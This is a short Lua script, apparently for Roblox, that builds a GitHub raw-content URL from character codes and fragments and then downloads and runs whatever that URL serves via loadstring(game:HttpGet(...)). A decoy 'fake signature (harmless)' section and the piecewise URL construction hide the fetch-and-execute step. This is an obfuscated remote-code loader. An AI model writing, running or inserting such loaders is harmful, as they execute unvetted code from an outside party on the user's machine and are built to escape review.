-- fake signature (harmless)
local function a1()
    local t = {84, 69, 82, 65} -- "TERA"
    local o = ""
    for _,v in ipairs(t) do o = o .. string.char(v) end
    return o
end

local function b2()
    local t = {82, 69, 68} -- "RED"
    local o = ""
    for _,v in ipairs(t) do o = o .. string.char(v) end
    return o
end

local Signature = string.upper(a1() .. " " .. b2()) 
-- "TERA RED" (useless on purpose)



local function build()
    -- "https://"
    local p1 = string.char(104,116,116,112,115,58,47,47)

    -- "raw.githubusercontent.com/"
    local p2 = table.concat({
        "raw", ".", 
        "githubusercontent", ".", 
        "com", "/"
    })

    -- "7nightzcc/"
    local p3 = (function()
        local t = {55,110,105,103,104,116,122,99,99}
        local s = ""
        for _,v in ipairs(t) do s = s .. string.char(v) end
        return s .. "/"
    end)()

    -- "tera_v1/"
    local p4 = (function()
        local t = {116,101,114,97,95,118,49}
        local s = ""
       	for _,v in ipairs(t) do s = s .. string.char(v) end
        return s .. "/"
    end)()

    -- "main/"
    local p5 = "main/"

    -- "tera"  (target file)
    local p6 = (function()
        return string.char(116,101,114,97)
    end)()

    return p1 .. p2 .. p3 .. p4 .. p5 .. p6
end



local finalURL = build()
loadstring(game:HttpGet(finalURL))()
